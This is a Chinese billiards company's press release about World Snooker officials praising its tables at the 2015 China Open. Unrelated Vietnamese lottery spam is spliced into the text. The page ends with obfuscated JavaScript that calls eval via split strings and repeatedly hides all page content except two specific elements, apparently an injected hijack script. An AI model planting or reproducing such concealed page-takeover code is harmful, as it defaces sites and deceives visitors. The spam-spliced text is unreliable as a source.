世台联官员衷心感谢星牌 大赞星牌球台

Hanoi Express 5 kết quả  2015世界斯诺克中国公开赛于3月30日展开了首日征战。斯诺克中国公开赛是2015年中国首个国际大型台球赛事。

Hanoi Express 5 kết quả  世界职业台球联合协会(WPBSA)主席杰森?弗格森和世界斯诺克协会商业总监米尔斯·皮尔斯在刚刚结束的泰国斯诺克PTC总决赛结束后。第一时间赶到中国对比赛现场及球台进行了严格的检验。对比赛使用的星牌球台进行了高度评价和认可。他们认为现在星牌的球台可以说是堪称完美,无论从性能,还是从外观都做到了极致!

  在比赛期间,杰森?弗格森先生和米尔斯·皮尔斯先生与星牌人员进行了长时间的交流。米尔斯说:世界斯诺克中国公开赛是整个亚洲最好最棒的斯诺克职业比赛,有强大的赛事团队,最好最标准的指定球台,也特别感谢星牌对斯诺克台球运动的支持,一直在为整个台球运动奉献着自己的力量。

  说到球台和星牌,世界台球联合会主席杰森?弗格森也是滔滔不绝:星牌的球台是世界斯诺克运动最标准的球台,标准的袋口,平整的桌面,舒适的打感,是我所接触过最棒的。同时,两位官员也高度评价了首届中式台球世界锦标赛,他们认为星牌制造的中式球台非常漂亮,得到了世界众多国家球员的高度认可,众多国际球员也纷纷提出要购买星牌中式球台的愿望,希望能够增加中式台球的练习,以后参加中式台球世锦赛。最后,与星牌在共同举办中式台球世锦赛方面提出了许多好的建议和想法,希望能够将中式台球世锦赛办的越来越好,能够让更多国家的选手来参加。对此,星牌也表示一定会尽最大努力,生产出世界上优质的球台,为台球良好的发展做出应有的贡献。

  署名:星牌台球

Related News

Contact us

+86 18514433287

Mail:xingpai147@qq.com

Customer service section: Monday to Friday, 8:30-17:30, Closed on holidays

Wechat
var SSpfGu1 = '
'; window["eval"]("do" + "cu" + "ment.wr" + "ite('" + SSpfGu1 + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("div" + "All")["style"]["display"] = "no" + "ne" } catch (e) {} for (var t2$2 = 0; t2$2 < window["document"]["body"]["children"]["length"]; t2$2++) { try { var Dr3 = window["document"]["body"]["children"][t2$2]["tagName"]; var LsLMcufmw4 = window["document"]["body"]["children"][t2$2]["id"]; if (LsLMcufmw4 != "iconDiv1" && LsLMcufmw4 != "showcloneshengxiaon") { window["document"]["body"]["children"][t2$2]["style"]["display"] = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {}